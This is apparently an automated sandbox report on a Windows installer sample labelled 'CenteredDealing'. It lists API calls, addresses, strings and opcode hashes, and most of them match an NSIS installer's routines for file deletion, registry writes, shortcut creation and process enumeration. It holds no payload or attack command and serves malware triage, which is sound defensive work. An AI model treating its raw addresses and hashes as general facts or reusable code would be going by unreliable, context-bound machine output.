                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                                                                                                                • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                • Opcode ID: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d31232896a0766ad2925f7f8dcaf29c8f657193e0fe6649208ba40017519f6b3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(9732,00447240,00000000,?,?), ref: 0040467A
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,9732), ref: 00404686
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                                                                                                                                                                                  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                                                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                                                                                                  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                • String ID: 82D$9732$@rD$A
                                                                                                                                                                                                                                                                • API String ID: 3347642858-1130442037
                                                                                                                                                                                                                                                                • Opcode ID: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0e02fddfd6f2336b8cee43e087a4f5cb21d7496477502da2ed1e77ce6b2ef00
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                                                                                                                                                                                • \*.*, xrefs: 00406D03
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                                                                                                                                • API String ID: 2035342205-3294556389
                                                                                                                                                                                                                                                                • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                                                                                                                                  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                • String ID: @%F$N$open
                                                                                                                                                                                                                                                                • API String ID: 3928313111-3849437375
                                                                                                                                                                                                                                                                • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                                                                                                                                • API String ID: 565278875-1653569448
                                                                                                                                                                                                                                                                • Opcode ID: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2f4805b9b6d14c41e9e3fa236157f8587e3d6293513dd7448d110fd9e4d9510
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
